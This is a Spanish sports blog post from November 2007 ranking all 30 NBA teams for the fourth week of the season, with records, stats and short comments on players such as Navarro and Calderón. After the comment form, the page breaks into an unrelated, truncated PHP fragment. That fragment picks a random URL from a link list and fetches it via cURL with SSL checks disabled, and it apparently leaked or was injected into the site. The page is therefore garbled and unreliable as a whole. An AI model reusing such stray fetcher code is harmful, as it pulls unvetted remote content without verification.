El termómetro de la NBA

26 de November de 2007 por telekoman

Esta cuarta semana nos deja en el primer puesto al equipo de San Antonio, que ha demostrado por qué es el vigente campeón ganando los 4 partidos que ha disputado, incluyendo el jugado contra Orlando. También nos deja la confirmación de que Boston es un Equipo que sabe ganar cuando vienen bien dadas y cuando vienen malas, y es capaz de sufrir hasta el último segundo con tal de ganar. Nos quedamos con la sensación de que esta temporada va a ser muy disputada, tanto en el Este, con Boston, Orlando y Milwaukee como principales pretendientes al título, como en el Oeste, con San Antonio, Phoenix y Utah. Por abajo las cosas siguen igual y Minnesota, Seattle y Chicago no parecen poder salir del agujero.

En clave individual destacar a varios jugadores que están apuntando realmente alto en este inicio de temporada y son claros candidatos a hacerse con el MVP de la regular season. Dwight Howard en Orlando, Carlos Boozer en Utah, Amare Stoudemire en Phoenix, Kevin Garnett en Boston y Tim Duncan en San Antonio. Junto a ellos otros jugadores que lo están haciendo realmente bien como Jefferson, Nash, Kidd, Iguodala o Al Jefferson

Desde el punto de vista español hay que destacar la explosión de Juan Carlos Navarro, que ha conseguido llegar a la titularidad en los Grizzlies y aportar grandes números al ataque de Memphis, y la confirmación de que Jose Manuel Calderón puede ser el base titular de Toronto tras los números obtenidos durante la lesión de TJ Ford.

Equipos que más suben: New Jersey (6), Milwaukee (5), San Antonio, Cleveland y Golden State (4)

Equipos que más bajan: Charlotte y Sacramento (5), New Orleans y LA Clippers (4)

Equipo (Posición anterior) Balance Ataque / Defensa Comentario

1
San Antonio (5) 12 – 2 101,0 (13) / 91,5 (2)

Llegan por primera vez esta temporada al número uno de nuestra lista tras haber ganado los 4 partidos disputados, todos por más de 12 puntos, y uno de ellos ante Orlando. Grandes credenciales de un equipo que no vamos a descubrir ahora. El trío Parker, Duncan, Ginobili, con la aportación al rebote de un Oberto que por fin está disfrutando de minutos, está resultado letal para todos los equipos, en especial en su casa donde están imbatidos tras 8 partidos.


2
Orlando (1) 12 – 3 104,1 (7) / 97,3 (13) Sí, es cierto que perdieron con San Antonio, pero tienen en sus filas al pivot del futuro, y ya del presente. Esta semana se han visto grandes duelos entre Dwight Howard y Tim Duncan y Shaquille O’Neal y ganó Howard y presenta su solicitud para MVP. Pero Orlando no es sólo su pivot, Lewis, Turkoglu o Nelson también están aportando grandes actuaciones. Esta semana inician gira por el Oeste para enfrentarse a Portland, Seattle, Phoenix y Lakers. Se intuye otro gran duelo, esta vez contra Stoudemire.

3
Boston (3) 11 – 1 102,7 (10) / 89,7 (1) Como se comenta en Boston, el Leprechaun ha vuelto tras su larga travesía por el desierto. Y ha vuelto acompañado de 3 grandes jugadores que están haciendo que la vida sea muy divertida. Con Kevin Garnett en más de 21 puntos y 11 rebotes de media apuntando a MVP de la temporada, Pierce 20 puntos y cerca de 7 asistencias, y Ray Allen capaz de sobreponerse a una mala racha de tiro para jugarse el tiro decisivo ante Charlotte y acertar, hay muy pocas formas de ganar a estos Celtics. Tal vez Cleveland en su doble enfrentamiento, New Yok o Miami sean capaces, pero… les damos pocas probabilidades.

4
Phoenix (4) 11 – 2 108,5 (1) / 100,5 (20)

Una nueva semana perfecta para los Suns, que tras su doble enfrentamiento con Sacramento, el primero con sufrimiento, y la cómoda victoria ante Clippers, se mantienen en nuestro Top 4. El ataque de Phoenix es fluido, con Nash repartiendo más de 12 asistencias por partido, Amare y Marion haciendo grandes números y Barbosa aportando minutos y puntos de mucha calidad. ¿Quizás sea este el año? Esta semana tendrán grandes enfrentamientos ante Houston y Orlando para demostrar que puede ser así.


5
Utah (8) 10 – 4 105,9 (3) / 97,4 (14) Cuarto en discordia para el MVP, Carlos Boozer, con una media de más de 23 puntos y 12 rebotes por partido, ha contribuido a que los Utah Jazz ganen los tres partidos disputados. El otro gran pilar, Deron Williams, ha demostrado que es el base del futuro, al dejar a Jason Kidd en 2 puntos y al ganar la partida a Chris Paul y Billups. Ahora mismo pueden ganar a cualquiera, y New York, Philadelphia o incluso los Lakers no parecen amenaza suficiente.

6
New Orleans (2) 10 – 5 96,3 (19) / 92,2 (3) Las lesiones han empezado a llegar y la lógica se ha adueñado de la situación haciendo que los Hornets abandonaran la primera posición de la SouthWest. Pero siguen ahí. West, Paul, Stojakovic y Chandler son más que capaces de amargarle el día a cualquiera. Sus próximas víctimas, Minnesota, Atlanta y Dallas.

7
Dallas (6) 9 – 4 102,8 (8) / 97,2 (12)

El equipo tejano parece haber entrado en una pequeña crisis de resultados tras haber perdido sus dos últimos encuentros ante Indiana y Milwaukee. Las derrotas, al igual que las victorias son con márgenes reducidos, lo que hace pensar que este equipo no tiene exactamente la misma mentalidad que el año pasado. Todos no preguntamos donde estará Dirk.


8
Denver (7) 9 – 5 105,1 (5) / 100,2 (19) Semana poco productiva en Denver. 2 victorias ante equipos del fondo de nuestra clasficación y 2 derrotas, la última de paliza frente a Houston, nos son una buena credencial para intentar arrebatar el título de la NorthWest a unos Jazz que van este año como una bala. La última derrota dejó además la lesión de Kevin Martin que complica mucho más la vida a los pupilos de George Karl, que verán sus opciones de ataque más reducidas.

9
Detroit (10) 8 – 5 97,5 (18) / 94,1 (7) Tras el paso de Utah por el Auburn Hill, el saldo de derrotas en casa se ha iniciado. Los sintomas son similares a los del año pasado, pero agravados por el paso del tiempo. Se esperaba algo más del banquillo de Detroit, pero tras la lesión de larga duración de Rodney Stuckey, las cosas no tienen buena pinta. Los reservas juegan poco, y los que lo hacen, no anotan. Con la lesión de Wallace, Jason Maxiell ha tomado el relevo, pero se nota que no está especialmente cómodo. Esta temporada regular será muy larga para los Pistons, y esperan llegar a Playoffs sanos. Entonces será otra cosa.

10
Cleveland (14) 8 – 6 101,6 (12) / 102,7 (24)

Tan sólo la visita al campeón ha resultado infructuosa esta semana para los chicos de LeBron, que ha promediado la increible cifra de 36 puntos y ha cosechado 2 triples dobles. Pero la rotación de los Cavaliers es reducida y a todas fluces insuficiente ante equipo mayores como San Antonio, Orlando, Dallas o Utah. Quizás es la hora de incluir otro fichaje de relumbrón junto a James, especialmente en el interior.


11
Milwaukee (16) 7 – 4 97,5 (17) / 98,0 (15) Milwaukee ha pasado la prueba y de qué manera tras ganar los 3 encuentros disputados esta semana. Michael Redd ha liderado con acierto a los Bucks promediando 29 puntos por partido y protagonizando duelos al sol con Kobe y Dirk de los que ha salido claramente venzedor. Guardando las espaldas Bogut y Mo Williams. Pero la plantilla es corta y veremos qué pasa cuando la temporada avance y comiencen a llegar las lesiones.

12
L.A. Lakers (9) 7 – 6 105,2 (4) / 100,9 (21) Con Kobe en tus filas puedes asegurar que tu caudal ofensivo será de los mejores de la liga, pero eso no te garantiza victorias, y más si defiendes con la mirada. Y eso ha pasado esta semana en las tres derrotas del equipo de Los Angeles, que se inició con el trade con Orlando que trajo a Trevor Ariza y envió a Cook y Evans. La baja forma exhibida por Lamar Odom en su regreso junto con la manifiesta debilidad defensiva han propiciado derrotas evitables, en especial frente a Nets y Bucks. Excepto la visita de Seattle, el resto de partidos que vienen (Denver, Utah y Orlando) serán muy peligrosos para los Lakers y ganar uno de ellos se podrá considerar un gran triunfo. Para lo que han quedado estos Lakers.

13
Toronto (15) 7 – 7 99,1 (15) / 95,5 (9)

Si hablamos de Toronto hablamos español. La semana no ha sido buena, pero el balance al menos no es negativo. En lo particular también hay buenas y malas noticias. Las buenas, Calderón está aprovechando estupendamente la baja de TJ Ford y está demostrando que es un gran base director (que ya se sabía) y que además puede anotar como esta noche frente a Chicago, donde ha conseguido 19 puntos y 14 asistencias. Las malas…la lesión de Jorge se enquista dentro de Toronto y las noticias son escasas, que es lo peor.


14

Houston (11)

7 – 7 95,6 (22) / 93,4 (5) Houston ha conseguido parar la caída libre que ya duraba 6 partidos y lo ha hecho de manera contundente. Pasando literalmente por encima de Denver. Y para ello ha necesitado toda la ayuda disponible. Aparte de recuperar a McGrady con 35 puntos y a Yao 22 puntos y 13 rebotes, ha conseguido algo que parece raro en la NBA actual, ganar desde el EQUIPO. Veremos si son capaces de mantener este espíritu. Tienen una semana propicia para ello con enfrentamientos con Clippers, Suns, Warriors y Kings

15
New Jersey (21)

7 – 7

88,4 (28) / 95,2 (8) Jefferson ha sido capaz de suplir el aporte ofensivo de Carter ante la lesión de este, promediando más de 27 puntos, y el equipo de New Jersey ha sido capaz de ganar 3 partidos seguidos, si bien todos con resultados demasiado justos y con tanteos muy bajos. Jason Kidd sigue haciendo triples dobles cuando quiere, excepto en su partido contra Utah, en el que se encontró con la horma de su zapato. Y esa horma se llama Deron. El regreso de Carter debe mejorar los resultados del equipo, que siguen teniendo en su juego interior uno de sus principales problemas.

16
L.A. Clippers (12) 6 – 6 96,3 (19) / 99,8 (18) Los Clippers tienen en el rebote una de sus mejores armas, y ahí Kaman lidera las operaciones. Otra de sus armas viene del tiro exterior donde Cassell y Mobley ponen sus condiciones…y sus años. Y esto es una gran desventaja. El equipo angelino está sufriendo una plaga de lesiones que sólo puede hacer bajar sus prestaciones como así ha sucedido esta semana. Si se mantienen sanos pueden llegar incluso a Playoffs.

17
Washington (17) 6 – 7 102,5 (11) / 103,0 (25)

La baja de Gilbert Arenas ha supuesto para Washington el pique por ver quién se hace con los galones. Caron Butler y Antawn Jamison se han propuesto animar el sombrío panorama capitalino y han firmado grandes actuaciones que sin embargo no han valido para ganar a equipos peleones (y escasos de defensa) como Warriors y Grizzlies.


18
Charlotte (13) 6 – 7 93,5 (25) / 96,3 (10) Una lástima para Charlotte. Han sido capaces de forzar mucho a Boston, casi hasta derrotarles, pero no ha sido posible. Además la semana no ha sido buena. Ganaron a Portland, pero fue en Charlotte, así que no tiene mérito, y perdieron frente a Wizards, Magic y Celtics, además de perder a Gerald Wallace, su mejor anotador, por lesión. Les falta un punto para ser un gran equipo. Su semana es relajada jugando en casa de Miami y de Chicago.

19
Indiana (18) 6 – 8 102,8 (9) / 105,4 (27) La baja de Jermaine O’Neal parece que le ha venido bien a los Pacers, en especial a Granger y a Tinsley que han visto incrementados sus números. Especialmente brillantes han sido las victorias ante Hornets y Mavericks. Pero sigue siendo un equipo con despistes y que no termina de aprovechar sus oportunidades como ha ocurrido esta noche frente a Cleveland y eso se paga.

20
Golden State (24) 5 – 7 107,0 (2) / 109,5 (30)

Gran semana visitante del equipo de Oakland que ha conseguido ganar 3 de los 4 partidos que ha disputado, y el que perdió fue frente a Boston. Fiel a su estilo de juego, los de Nelson, gracias a la incorporación de Stephen Jackson, han conseguido afianzar su tiro ligeramente y, pese a la paliza recibida por parte de Boston, mejorar su promedio defensivo, aunque siga siendo pésimo. Claro que por el oeste les visitan Phoenix y Houston y además visitan a Sacramento y Seattle. Si consiguen un 2-2 será un buen resultado.


21
Atlanta (22) 5 – 7 95,6 (21) / 98,1 (17) Con más de 23 puntos de media, Joe Johnson sigue siendo el hombre clave en estos jóvenes Hawks que han ganado los dos partidos que tenían ante equipos asequibles desde la defensa. Pero su ataque sigue siendo demasiado racheado y sus pérdidas de balón son algo menos que tolerables. Chicago, Milwaukee y New Orleans son sus próximos rivales, por lo que previsiblemente bajarán algún puesto, pero no demasiados.

22
Portland (20) 5 – 8 93,6 (24) / 98,0 (15) Por fin se rompió la tendencia y Portland ha perdido un partido en casa. Claro que sus aficionados pensarán si no era mejor romperla al revés, por que lo de ganar fuera sigue siendo una utopía. El equipo adolece de una falta de dirección bastante preocupante y ninguno de los tres bases (Blake, Jack y Sergio Rodriguez) están consiguiendo que el juego del equipo sea ni remotamente fluido. Demasiadas pérdidas y ataques precipitados. Este no va a ser su año, pero sí les va a hacer crecer. Inaugurar su casillero de victorias fuera de casa va a ser difícil esta semana pues se enfrentan a Dallas y San Antonio pero si es posible que consigan alguna victoria en casa frente a Orlando e Indiana.

23
Memphis (25) 4 – 9 104,8 (6) / 107,8 (28)

Booooombbaaaaaa. Era evidente, y todos sabíamos que acabaría pasando, aunque la rapidez nos ha sorprendido a todos, incluidos sus rivales. Navarro se ha convertido en otra gran referencia en el ataque de los Grizzlies, volviendo a repetir esos 28 puntos, esta vez frente a los Wizards. Le veremos seguro en el fin de semana del AllStar en New Orleans. Y Gasol parece que se une a la fiesta, cogiendo posiciones de 5 ahora que Millicic está lesionado. Y de nuevo esta semana una nueva oportunidad de ver 3 españoles en cancha (lástima lo de Jorge) y ahora es posible que empezando el patido de inicio.


24
Sacramento (19) 4 – 9 98,8 (16) / 104,5 (26) Tener en la misma semana dos enfrentamientos seguidos con Phoenix no es bueno para la salud de nadie. Y eso que en el primer enfrentamiento estuvieron a punto de dar la sorpresa gracias a los 33 puntos y 12 rebotes de Ron Artest. Pero al final se impuso la tozuda lógica y se hicieron patentes varias realidades. Kevin Martin es muy bueno, Francisco García será un buen jugador, a Sacramento le falta un base más que el comer. Con estas perspectivas, los Kings descansan en el fondo de la División Pacifico, esperando en casa el paso de San Antonio, Golden State y Houston.

25
New York (26) 3 – 9 95,3 (23) / 101,8 (23) De nuevo mala semana para el equipo neoyorkino, ya que ganar a Chicago, sólo por 7 y sin llegar a 90 puntos no puede considerarse un gran resultado. El equipo está echando de menos a Randolph, muy escaso en ataque en un equipo con un exceso de tiradores exteriores que no están teniendo su racha (y van ya…). Además afrontan una semana que posiblemente les hunda más en la clasificación con Utah, Boston, Milwaukee y Phoenix que están dispuestos a no hacer prisioneros.

26
Philadelphia (23) 3 – 9 89,9 (27) / 93,8 (6)

Parece que Louis Williams ha aparecido en Philadelphia para quedarse y formar junto con Iguodala un gran asociación que puede dar a los 76ers grandes alegrías siempre que consigan encontrar un refuerzo de garantías para Dalembert. Pero es pronto para que esta asociación empiece a dar frutos en forma de victorias y de ahí las 3 derrotas de esta semana. Y habrá más como esta, eso sin duda.


27
Miami (28) 3 – 10 87,4 (29) / 92,4 (4) Decíamos en el anterior termómetro, que la semana iba a ser dura para Miami, y no nos equivocabamos. Pero Shaq es mucho Shaq, y en su duelo con Yao salió claramente vencedor. Pero con sólo tres jugadores anotando activamente es muy dificil ganar en la NBA actual. De ahí las dudas sobre el futuro de Wade. El equipo mejorará, y quizás la semana que viene empiece la remontada, pero Charlotte, Denver y sobre todo Boston no se lo van a poner nada fácil.

28
Chicago (27) 2 – 10 86,5 (30) / 96,5 (11) Chicago vuelve a bajar esta semana. El paciente está grave, y la lesión de Deng lo ha agravado más aún. Pero incluso con su vuelta los males no remiten. Las derrotas ante Denver y Toronto escuecen, pero perder ante los Knicks duele en lo más profundo del alma. Con sólo 2 partidos en casa frente a Charlotte y Dallas, el enfermo puede guardar cama e intentar la recuperación.

29
Seattle (29) 2 – 12 99,6 (14) / 108,6 (29)

De nuevo una semana sin victorias para el cuadro de Seattle, que sigue teniendo al Rookie Durant como principal activo ofensivo, y donde se echa en falta un base director que consiga ordenar el juego y reducir la gran cantidad de pérdidas. Hay esperanzas para el futuro, sobre todo teniendo en cuenta que el puesto en el próximo draft seguro que será bueno. Mientras que llega este futuro, los Supersonics visitarán Los Angeles para enfrentarse a los Lakers, y recibirán a Orlando, Indiana y Golden State


30
Minnesota (30) 1 – 10 92,5 (26) / 101,1 (22) Tras alcanzar la semana pasada el puesto más bajo de la clasificación con una única victoria, los Timberwolves continúan ahí. Y posiblemente ahí se queden pese a las buenas actuaciones de Al Jefferson, que ha promediado esta semana más de 23 puntos y casi 13 rebotes por partido. Y las risas de Kevin Garnett todavía se están escuchando. Y con New Orleans, Dallas, San Antonio y Memphis como rivales esta semana, la cosa sólo puede empeorar.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>